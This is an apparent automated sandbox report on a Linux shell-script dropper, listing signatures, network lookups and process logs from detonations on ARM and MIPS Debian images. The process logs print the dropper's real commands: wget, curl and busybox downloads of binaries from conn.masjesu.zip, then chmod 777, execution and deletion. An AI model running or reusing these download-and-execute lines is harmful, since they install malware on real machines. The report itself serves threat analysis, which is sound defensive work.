Malware Analysis Report

2025-04-03 18:52

Sample ID 241120-dx72lsvkan
Target cae0f3aa5baf5db3fa86dff484e23996d5cf8abbf537303d56d7ef7b2003e5ca.sh
SHA256 cae0f3aa5baf5db3fa86dff484e23996d5cf8abbf537303d56d7ef7b2003e5ca
Tags
antivm discovery defense_evasion
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

cae0f3aa5baf5db3fa86dff484e23996d5cf8abbf537303d56d7ef7b2003e5ca

Threat Level: Shows suspicious behavior

The file cae0f3aa5baf5db3fa86dff484e23996d5cf8abbf537303d56d7ef7b2003e5ca.sh was found to be: Shows suspicious behavior.

Malicious Activity Summary

antivm discovery defense_evasion

File and Directory Permissions Modification

Executes dropped EXE

Checks CPU configuration

System Network Configuration Discovery

Writes file to tmp directory

Reads runtime system information

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-20 03:24

Signatures

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-20 03:24

Reported

2024-11-20 03:26

Platform

debian9-armhf-20240729-en

Max time kernel

148s

Max time network

3s

Command Line

[/tmp/cae0f3aa5baf5db3fa86dff484e23996d5cf8abbf537303d56d7ef7b2003e5ca.sh]

Signatures

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/self/auxv /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A

Processes

/tmp/cae0f3aa5baf5db3fa86dff484e23996d5cf8abbf537303d56d7ef7b2003e5ca.sh

[/tmp/cae0f3aa5baf5db3fa86dff484e23996d5cf8abbf537303d56d7ef7b2003e5ca.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG]

Network

Country Destination Domain Proto
US 1.1.1.1:53 conn.masjesu.zip udp
US 1.1.1.1:53 conn.masjesu.zip udp

Files

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-11-20 03:24

Reported

2024-11-20 03:27

Platform

debian9-mipsbe-20240418-en

Max time kernel

97s

Max time network

99s

Command Line

[/tmp/cae0f3aa5baf5db3fa86dff484e23996d5cf8abbf537303d56d7ef7b2003e5ca.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG /tmp/WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG N/A
N/A /tmp/FGPPjJkNp6juPupFXpnlM5Pk4GQ1XOfedx /tmp/FGPPjJkNp6juPupFXpnlM5Pk4GQ1XOfedx N/A
N/A /tmp/JvxUArkHjLKhR0iDE16tTHEkSvlg7mtrHx /tmp/JvxUArkHjLKhR0iDE16tTHEkSvlg7mtrHx N/A
N/A /tmp/BPME29EV9N6hmmo6w85WDzBep2U2iy0cWa /tmp/BPME29EV9N6hmmo6w85WDzBep2U2iy0cWa N/A
N/A /tmp/tfulUtiwcGoNnKWNTxI5ZM0AYRs4bKf9cN /tmp/tfulUtiwcGoNnKWNTxI5ZM0AYRs4bKf9cN N/A
N/A /tmp/idnGNyuDmgXtrrMK2gSYIIEEESp0hj15J4 /tmp/idnGNyuDmgXtrrMK2gSYIIEEESp0hj15J4 N/A
N/A /tmp/mCr9mPdN28V3Gp6Rv8cn31xESvvDYL3Fa1 /tmp/mCr9mPdN28V3Gp6Rv8cn31xESvvDYL3Fa1 N/A
N/A /tmp/4rHixWyNmsx0szqzpWJaZeoKyOAcs3oON8 /tmp/4rHixWyNmsx0szqzpWJaZeoKyOAcs3oON8 N/A
N/A /tmp/DQul2qKd09ITKkHJpETty8DirCA07F1nBT /tmp/DQul2qKd09ITKkHJpETty8DirCA07F1nBT N/A
N/A /tmp/teb0EwBkAsUTRHDbmUU61VmaAQLtJ4tHdz /tmp/teb0EwBkAsUTRHDbmUU61VmaAQLtJ4tHdz N/A
N/A /tmp/PU2Tx3XhB135BQdHCubzS3AEjqVMNEEoWx /tmp/PU2Tx3XhB135BQdHCubzS3AEjqVMNEEoWx N/A
N/A /tmp/ixEc8Uo2OgF5hXDmp3rvN61CxWLaS6oa2m /tmp/ixEc8Uo2OgF5hXDmp3rvN61CxWLaS6oa2m N/A
N/A /tmp/2uBrEuvqADi118fB1BE0Xz2VKKetNSOIFS /tmp/2uBrEuvqADi118fB1BE0Xz2VKKetNSOIFS N/A
N/A /tmp/zbq5Y476dvNQ394RN8IM6UoW9NRkMhg9Rh /tmp/zbq5Y476dvNQ394RN8IM6UoW9NRkMhg9Rh N/A
N/A /tmp/mCr9mPdN28V3Gp6Rv8cn31xESvvDYL3Fa1 /tmp/mCr9mPdN28V3Gp6Rv8cn31xESvvDYL3Fa1 N/A
N/A /tmp/WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG /tmp/WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG N/A
N/A /tmp/FGPPjJkNp6juPupFXpnlM5Pk4GQ1XOfedx /tmp/FGPPjJkNp6juPupFXpnlM5Pk4GQ1XOfedx N/A
N/A /tmp/JvxUArkHjLKhR0iDE16tTHEkSvlg7mtrHx /tmp/JvxUArkHjLKhR0iDE16tTHEkSvlg7mtrHx N/A
N/A /tmp/BPME29EV9N6hmmo6w85WDzBep2U2iy0cWa /tmp/BPME29EV9N6hmmo6w85WDzBep2U2iy0cWa N/A
N/A /tmp/tfulUtiwcGoNnKWNTxI5ZM0AYRs4bKf9cN /tmp/tfulUtiwcGoNnKWNTxI5ZM0AYRs4bKf9cN N/A
N/A /tmp/idnGNyuDmgXtrrMK2gSYIIEEESp0hj15J4 /tmp/idnGNyuDmgXtrrMK2gSYIIEEESp0hj15J4 N/A
N/A /tmp/4rHixWyNmsx0szqzpWJaZeoKyOAcs3oON8 /tmp/4rHixWyNmsx0szqzpWJaZeoKyOAcs3oON8 N/A
N/A /tmp/DQul2qKd09ITKkHJpETty8DirCA07F1nBT /tmp/DQul2qKd09ITKkHJpETty8DirCA07F1nBT N/A
N/A /tmp/zbq5Y476dvNQ394RN8IM6UoW9NRkMhg9Rh /tmp/zbq5Y476dvNQ394RN8IM6UoW9NRkMhg9Rh N/A
N/A /tmp/teb0EwBkAsUTRHDbmUU61VmaAQLtJ4tHdz /tmp/teb0EwBkAsUTRHDbmUU61VmaAQLtJ4tHdz N/A
N/A /tmp/PU2Tx3XhB135BQdHCubzS3AEjqVMNEEoWx /tmp/PU2Tx3XhB135BQdHCubzS3AEjqVMNEEoWx N/A
N/A /tmp/ixEc8Uo2OgF5hXDmp3rvN61CxWLaS6oa2m /tmp/ixEc8Uo2OgF5hXDmp3rvN61CxWLaS6oa2m N/A
N/A /tmp/2uBrEuvqADi118fB1BE0Xz2VKKetNSOIFS /tmp/2uBrEuvqADi118fB1BE0Xz2VKKetNSOIFS N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/ixEc8Uo2OgF5hXDmp3rvN61CxWLaS6oa2m /usr/bin/curl N/A
File opened for modification /tmp/tfulUtiwcGoNnKWNTxI5ZM0AYRs4bKf9cN /usr/bin/curl N/A
File opened for modification /tmp/zbq5Y476dvNQ394RN8IM6UoW9NRkMhg9Rh /usr/bin/curl N/A
File opened for modification /tmp/teb0EwBkAsUTRHDbmUU61VmaAQLtJ4tHdz /usr/bin/curl N/A
File opened for modification /tmp/mCr9mPdN28V3Gp6Rv8cn31xESvvDYL3Fa1 /usr/bin/curl N/A
File opened for modification /tmp/4rHixWyNmsx0szqzpWJaZeoKyOAcs3oON8 /usr/bin/curl N/A
File opened for modification /tmp/FGPPjJkNp6juPupFXpnlM5Pk4GQ1XOfedx /usr/bin/curl N/A
File opened for modification /tmp/tfulUtiwcGoNnKWNTxI5ZM0AYRs4bKf9cN /usr/bin/curl N/A
File opened for modification /tmp/mCr9mPdN28V3Gp6Rv8cn31xESvvDYL3Fa1 /usr/bin/curl N/A
File opened for modification /tmp/idnGNyuDmgXtrrMK2gSYIIEEESp0hj15J4 /usr/bin/curl N/A
File opened for modification /tmp/PU2Tx3XhB135BQdHCubzS3AEjqVMNEEoWx /usr/bin/curl N/A
File opened for modification /tmp/FGPPjJkNp6juPupFXpnlM5Pk4GQ1XOfedx /usr/bin/curl N/A
File opened for modification /tmp/BPME29EV9N6hmmo6w85WDzBep2U2iy0cWa /usr/bin/curl N/A
File opened for modification /tmp/ixEc8Uo2OgF5hXDmp3rvN61CxWLaS6oa2m /usr/bin/curl N/A
File opened for modification /tmp/2uBrEuvqADi118fB1BE0Xz2VKKetNSOIFS /usr/bin/curl N/A
File opened for modification /tmp/idnGNyuDmgXtrrMK2gSYIIEEESp0hj15J4 /usr/bin/curl N/A
File opened for modification /tmp/zbq5Y476dvNQ394RN8IM6UoW9NRkMhg9Rh /usr/bin/curl N/A
File opened for modification /tmp/WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG /usr/bin/curl N/A
File opened for modification /tmp/WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG /usr/bin/curl N/A
File opened for modification /tmp/4rHixWyNmsx0szqzpWJaZeoKyOAcs3oON8 /usr/bin/curl N/A
File opened for modification /tmp/teb0EwBkAsUTRHDbmUU61VmaAQLtJ4tHdz /usr/bin/curl N/A
File opened for modification /tmp/JvxUArkHjLKhR0iDE16tTHEkSvlg7mtrHx /usr/bin/curl N/A
File opened for modification /tmp/BPME29EV9N6hmmo6w85WDzBep2U2iy0cWa /usr/bin/curl N/A
File opened for modification /tmp/DQul2qKd09ITKkHJpETty8DirCA07F1nBT /usr/bin/curl N/A
File opened for modification /tmp/2uBrEuvqADi118fB1BE0Xz2VKKetNSOIFS /usr/bin/curl N/A
File opened for modification /tmp/JvxUArkHjLKhR0iDE16tTHEkSvlg7mtrHx /usr/bin/curl N/A
File opened for modification /tmp/DQul2qKd09ITKkHJpETty8DirCA07F1nBT /usr/bin/curl N/A
File opened for modification /tmp/PU2Tx3XhB135BQdHCubzS3AEjqVMNEEoWx /usr/bin/curl N/A

Processes

/tmp/cae0f3aa5baf5db3fa86dff484e23996d5cf8abbf537303d56d7ef7b2003e5ca.sh

[/tmp/cae0f3aa5baf5db3fa86dff484e23996d5cf8abbf537303d56d7ef7b2003e5ca.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG]

/bin/chmod

[chmod 777 WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG]

/tmp/WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG

[./WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG]

/bin/rm

[rm WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/FGPPjJkNp6juPupFXpnlM5Pk4GQ1XOfedx]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/FGPPjJkNp6juPupFXpnlM5Pk4GQ1XOfedx]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/FGPPjJkNp6juPupFXpnlM5Pk4GQ1XOfedx]

/bin/chmod

[chmod 777 FGPPjJkNp6juPupFXpnlM5Pk4GQ1XOfedx]

/tmp/FGPPjJkNp6juPupFXpnlM5Pk4GQ1XOfedx

[./FGPPjJkNp6juPupFXpnlM5Pk4GQ1XOfedx]

/bin/rm

[rm FGPPjJkNp6juPupFXpnlM5Pk4GQ1XOfedx]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/JvxUArkHjLKhR0iDE16tTHEkSvlg7mtrHx]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/JvxUArkHjLKhR0iDE16tTHEkSvlg7mtrHx]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/JvxUArkHjLKhR0iDE16tTHEkSvlg7mtrHx]

/bin/chmod

[chmod 777 JvxUArkHjLKhR0iDE16tTHEkSvlg7mtrHx]

/tmp/JvxUArkHjLKhR0iDE16tTHEkSvlg7mtrHx

[./JvxUArkHjLKhR0iDE16tTHEkSvlg7mtrHx]

/bin/rm

[rm JvxUArkHjLKhR0iDE16tTHEkSvlg7mtrHx]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/BPME29EV9N6hmmo6w85WDzBep2U2iy0cWa]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/BPME29EV9N6hmmo6w85WDzBep2U2iy0cWa]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/BPME29EV9N6hmmo6w85WDzBep2U2iy0cWa]

/bin/chmod

[chmod 777 BPME29EV9N6hmmo6w85WDzBep2U2iy0cWa]

/tmp/BPME29EV9N6hmmo6w85WDzBep2U2iy0cWa

[./BPME29EV9N6hmmo6w85WDzBep2U2iy0cWa]

/bin/rm

[rm BPME29EV9N6hmmo6w85WDzBep2U2iy0cWa]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/tfulUtiwcGoNnKWNTxI5ZM0AYRs4bKf9cN]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/tfulUtiwcGoNnKWNTxI5ZM0AYRs4bKf9cN]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/tfulUtiwcGoNnKWNTxI5ZM0AYRs4bKf9cN]

/bin/chmod

[chmod 777 tfulUtiwcGoNnKWNTxI5ZM0AYRs4bKf9cN]

/tmp/tfulUtiwcGoNnKWNTxI5ZM0AYRs4bKf9cN

[./tfulUtiwcGoNnKWNTxI5ZM0AYRs4bKf9cN]

/bin/rm

[rm tfulUtiwcGoNnKWNTxI5ZM0AYRs4bKf9cN]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/idnGNyuDmgXtrrMK2gSYIIEEESp0hj15J4]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/idnGNyuDmgXtrrMK2gSYIIEEESp0hj15J4]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/idnGNyuDmgXtrrMK2gSYIIEEESp0hj15J4]

/bin/chmod

[chmod 777 idnGNyuDmgXtrrMK2gSYIIEEESp0hj15J4]

/tmp/idnGNyuDmgXtrrMK2gSYIIEEESp0hj15J4

[./idnGNyuDmgXtrrMK2gSYIIEEESp0hj15J4]

/bin/rm

[rm idnGNyuDmgXtrrMK2gSYIIEEESp0hj15J4]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/mCr9mPdN28V3Gp6Rv8cn31xESvvDYL3Fa1]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/mCr9mPdN28V3Gp6Rv8cn31xESvvDYL3Fa1]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/mCr9mPdN28V3Gp6Rv8cn31xESvvDYL3Fa1]

/bin/chmod

[chmod 777 mCr9mPdN28V3Gp6Rv8cn31xESvvDYL3Fa1]

/tmp/mCr9mPdN28V3Gp6Rv8cn31xESvvDYL3Fa1

[./mCr9mPdN28V3Gp6Rv8cn31xESvvDYL3Fa1]

/bin/rm

[rm mCr9mPdN28V3Gp6Rv8cn31xESvvDYL3Fa1]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/4rHixWyNmsx0szqzpWJaZeoKyOAcs3oON8]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/4rHixWyNmsx0szqzpWJaZeoKyOAcs3oON8]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/4rHixWyNmsx0szqzpWJaZeoKyOAcs3oON8]

/bin/chmod

[chmod 777 4rHixWyNmsx0szqzpWJaZeoKyOAcs3oON8]

/tmp/4rHixWyNmsx0szqzpWJaZeoKyOAcs3oON8

[./4rHixWyNmsx0szqzpWJaZeoKyOAcs3oON8]

/bin/rm

[rm 4rHixWyNmsx0szqzpWJaZeoKyOAcs3oON8]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/DQul2qKd09ITKkHJpETty8DirCA07F1nBT]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/DQul2qKd09ITKkHJpETty8DirCA07F1nBT]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/DQul2qKd09ITKkHJpETty8DirCA07F1nBT]

/bin/chmod

[chmod 777 DQul2qKd09ITKkHJpETty8DirCA07F1nBT]

/tmp/DQul2qKd09ITKkHJpETty8DirCA07F1nBT

[./DQul2qKd09ITKkHJpETty8DirCA07F1nBT]

/bin/rm

[rm DQul2qKd09ITKkHJpETty8DirCA07F1nBT]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/teb0EwBkAsUTRHDbmUU61VmaAQLtJ4tHdz]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/teb0EwBkAsUTRHDbmUU61VmaAQLtJ4tHdz]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/teb0EwBkAsUTRHDbmUU61VmaAQLtJ4tHdz]

/bin/chmod

[chmod 777 teb0EwBkAsUTRHDbmUU61VmaAQLtJ4tHdz]

/tmp/teb0EwBkAsUTRHDbmUU61VmaAQLtJ4tHdz

[./teb0EwBkAsUTRHDbmUU61VmaAQLtJ4tHdz]

/bin/rm

[rm teb0EwBkAsUTRHDbmUU61VmaAQLtJ4tHdz]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/PU2Tx3XhB135BQdHCubzS3AEjqVMNEEoWx]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/PU2Tx3XhB135BQdHCubzS3AEjqVMNEEoWx]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/PU2Tx3XhB135BQdHCubzS3AEjqVMNEEoWx]

/bin/chmod

[chmod 777 PU2Tx3XhB135BQdHCubzS3AEjqVMNEEoWx]

/tmp/PU2Tx3XhB135BQdHCubzS3AEjqVMNEEoWx

[./PU2Tx3XhB135BQdHCubzS3AEjqVMNEEoWx]

/bin/rm

[rm PU2Tx3XhB135BQdHCubzS3AEjqVMNEEoWx]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/ixEc8Uo2OgF5hXDmp3rvN61CxWLaS6oa2m]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/ixEc8Uo2OgF5hXDmp3rvN61CxWLaS6oa2m]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/ixEc8Uo2OgF5hXDmp3rvN61CxWLaS6oa2m]

/bin/chmod

[chmod 777 ixEc8Uo2OgF5hXDmp3rvN61CxWLaS6oa2m]

/tmp/ixEc8Uo2OgF5hXDmp3rvN61CxWLaS6oa2m

[./ixEc8Uo2OgF5hXDmp3rvN61CxWLaS6oa2m]

/bin/rm

[rm ixEc8Uo2OgF5hXDmp3rvN61CxWLaS6oa2m]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/2uBrEuvqADi118fB1BE0Xz2VKKetNSOIFS]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/2uBrEuvqADi118fB1BE0Xz2VKKetNSOIFS]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/2uBrEuvqADi118fB1BE0Xz2VKKetNSOIFS]

/bin/chmod

[chmod 777 2uBrEuvqADi118fB1BE0Xz2VKKetNSOIFS]

/tmp/2uBrEuvqADi118fB1BE0Xz2VKKetNSOIFS

[./2uBrEuvqADi118fB1BE0Xz2VKKetNSOIFS]

/bin/rm

[rm 2uBrEuvqADi118fB1BE0Xz2VKKetNSOIFS]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/zbq5Y476dvNQ394RN8IM6UoW9NRkMhg9Rh]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/zbq5Y476dvNQ394RN8IM6UoW9NRkMhg9Rh]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/zbq5Y476dvNQ394RN8IM6UoW9NRkMhg9Rh]

/bin/chmod

[chmod 777 zbq5Y476dvNQ394RN8IM6UoW9NRkMhg9Rh]

/tmp/zbq5Y476dvNQ394RN8IM6UoW9NRkMhg9Rh

[./zbq5Y476dvNQ394RN8IM6UoW9NRkMhg9Rh]

/bin/rm

[rm zbq5Y476dvNQ394RN8IM6UoW9NRkMhg9Rh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/mCr9mPdN28V3Gp6Rv8cn31xESvvDYL3Fa1]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/mCr9mPdN28V3Gp6Rv8cn31xESvvDYL3Fa1]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/mCr9mPdN28V3Gp6Rv8cn31xESvvDYL3Fa1]

/bin/chmod

[chmod 777 mCr9mPdN28V3Gp6Rv8cn31xESvvDYL3Fa1]

/tmp/mCr9mPdN28V3Gp6Rv8cn31xESvvDYL3Fa1

[./mCr9mPdN28V3Gp6Rv8cn31xESvvDYL3Fa1]

/bin/rm

[rm mCr9mPdN28V3Gp6Rv8cn31xESvvDYL3Fa1]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG]

/bin/chmod

[chmod 777 WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG]

/tmp/WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG

[./WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG]

/bin/rm

[rm WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/FGPPjJkNp6juPupFXpnlM5Pk4GQ1XOfedx]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/FGPPjJkNp6juPupFXpnlM5Pk4GQ1XOfedx]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/FGPPjJkNp6juPupFXpnlM5Pk4GQ1XOfedx]

/bin/chmod

[chmod 777 FGPPjJkNp6juPupFXpnlM5Pk4GQ1XOfedx]

/tmp/FGPPjJkNp6juPupFXpnlM5Pk4GQ1XOfedx

[./FGPPjJkNp6juPupFXpnlM5Pk4GQ1XOfedx]

/bin/rm

[rm FGPPjJkNp6juPupFXpnlM5Pk4GQ1XOfedx]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/JvxUArkHjLKhR0iDE16tTHEkSvlg7mtrHx]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/JvxUArkHjLKhR0iDE16tTHEkSvlg7mtrHx]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/JvxUArkHjLKhR0iDE16tTHEkSvlg7mtrHx]

/bin/chmod

[chmod 777 JvxUArkHjLKhR0iDE16tTHEkSvlg7mtrHx]

/tmp/JvxUArkHjLKhR0iDE16tTHEkSvlg7mtrHx

[./JvxUArkHjLKhR0iDE16tTHEkSvlg7mtrHx]

/bin/rm

[rm JvxUArkHjLKhR0iDE16tTHEkSvlg7mtrHx]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/BPME29EV9N6hmmo6w85WDzBep2U2iy0cWa]

/usr/bin/curl

